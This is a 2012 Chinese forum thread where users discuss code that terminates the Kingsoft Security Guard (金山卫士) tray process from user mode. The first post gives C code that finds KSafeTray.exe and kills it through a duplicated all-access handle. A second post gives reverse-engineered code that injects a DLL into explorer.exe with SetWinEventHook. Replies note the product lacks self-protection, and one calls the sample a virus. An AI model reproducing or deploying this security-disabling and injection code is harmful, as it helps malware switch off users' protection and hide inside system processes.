刚刚发现这么个东西，说是可以kill金山卫士，大家帮忙看看

显示全部楼层 · 发表于 2012-12-21 23:44:28

R3下强K金山卫士

制作人：DeeJayX

#include <Tlhelp32.h>

DWORD GetPID (char* proc)
{
BOOL working=0;
PROCESSENTRY32 lppe= {0};
DWORD targetPid=0;
HANDLE hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS ,0);

if (hSnapshot)
{
lppe.dwSize=sizeof(lppe);
working=Process32First(hSnapshot,&lppe);
while (working)
{
if (_stricmp(lppe.szExeFile,proc)==0)//不区分大小写
{
targetPid=lppe.th32ProcessID;
break;
}
working=Process32Next(hSnapshot,&lppe);
}
}

CloseHandle( hSnapshot );
return targetPid;
}

BOOL EnablePrivilege1(HANDLE hToken,LPCSTR szPrivName)
{
TOKEN_PRIVILEGES tkp;

LookupPrivilegeValue( NULL,szPrivName,&tkp.Privileges[0].Luid );//修改进程权限
tkp.PrivilegeCount=1;
tkp.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges( hToken,FALSE,&tkp,sizeof tkp,NULL,NULL );//通知系统修改进程权限

return( (GetLastError()==ERROR_SUCCESS) );

}

int killProcess(DWORD dwPID)
{
HANDLE hNewHandle;
HANDLE hCurrentProc = GetCurrentProcess();
HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION, FALSE, dwPID);
if(hProcess)
{
HANDLE hToken;
if (OpenProcessToken(hProcess,TOKEN_ADJUST_PRIVILEGES,&hToken))
{
if (EnablePrivilege1(hToken,SE_DEBUG_NAME))
{
}
}

BOOL bIsSucc = DuplicateHandle(hCurrentProc, hProcess, hCurrentProc,
&hNewHandle,
PROCESS_ALL_ACCESS,
FALSE,
0);
if(bIsSucc)
{
TerminateProcess(hNewHandle, 0);
OutputDebugString("打开成功");
CloseHandle(hNewHandle);
}
else
{
OutputDebugString("打开失败");
}
CloseHandle(hProcess);
}
return 1;
}

HKEY ck;
if (ERROR_SUCCESS==RegOpenKeyEx(HKEY_LOCAL_MACHINE,(LPCTSTR)"SOFTWARE\\KSafe\\",0,KEY_ALL_ACCESS,&ck))
{
killProcess(GetPID("KSafeTray.exe"));
}

显示全部楼层 · 发表于 2012-12-21 23:45:46

#include <Tlhelp32.h.>
#include <shlwapi.h>
#pragma comment(lib,"shlwapi.lib")
int GetPID(CHAR *P)
{
DWORD dwPid = 0;
BOOL bRet = FALSE;
HANDLE Snapshot;
PROCESSENTRY32 processListStr;

Snapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
processListStr.dwSize=sizeof(PROCESSENTRY32);
bRet = Process32First(Snapshot,&processListStr);
while(bRet)
{
if(lstrcmpiA(processListStr.szExeFile,P)==0 )
{
dwPid = processListStr.th32ProcessID;
break;
}

bRet=Process32Next(Snapshot,&processListStr);
}

CloseHandle(Snapshot);

return dwPid;
}

void SetRun()
{
HMODULE hDll;
HMODULE hDllInsert;
FARPROC pAddr;
int nPID;
CHAR LibFileName [256];

GetModuleFileNameA(0, LibFileName, 256); //DS:[004085C0]=7C80B56F (kernel32.GetModuleFileNameA)
PathRemoveFileSpecA(LibFileName);
lstrcatA(LibFileName, "\\Ccb_detect_hdzb.dll");
hDll = LoadLibraryA(LibFileName);
hDllInsert = hDll;
pAddr = GetProcAddress(hDll, "DriverInfo");
nPID = GetPID("explorer.exe");
HWINEVENTHOOK hHook = SetWinEventHook(EVENT_MIN,EVENT_MAX,hDllInsert,WINEVENTPROC(pAddr),nPID,0,WINEVENT_INCONTEXT );
Sleep(5000);
UnhookWinEvent(hHook);
FreeLibrary(hDllInsert);
}

这个是干什么的.......标题是逆向来的代码

显示全部楼层 · 发表于 2012-12-21 23:47:15

上传附件吧有病毒

显示全部楼层 · 发表于 2012-12-21 23:57:40

Kill金山卫士还需要这样？？？？

任务管理器就好了。。。。。人家又不是杀软

显示全部楼层 · 发表于 2012-12-22 01:01:24

楼主。。金山卫士不加驱无自保
任务管理器就可以关闭了。。。还需要别的吗。。

显示全部楼层 · 发表于 2012-12-22 12:44:43

22667999 发表于 2012-12-22 01:01
楼主。。金山卫士不加驱无自保
任务管理器就可以关闭了。。。还需要别的吗。。

不需要了

显示全部楼层 · 发表于 2012-12-22 12:45:09

油条大师发表于 2012-12-22 12:44
不需要了

可是是病毒啊

显示全部楼层 · 发表于 2012-12-22 13:44:18

卫士没自保

显示全部楼层 · 发表于 2012-12-22 18:21:31

卫士无自保，想怎么玩儿就怎么玩儿。

[金山] 刚刚发现这么个东西，说是可以kill金山卫士，大家帮忙看看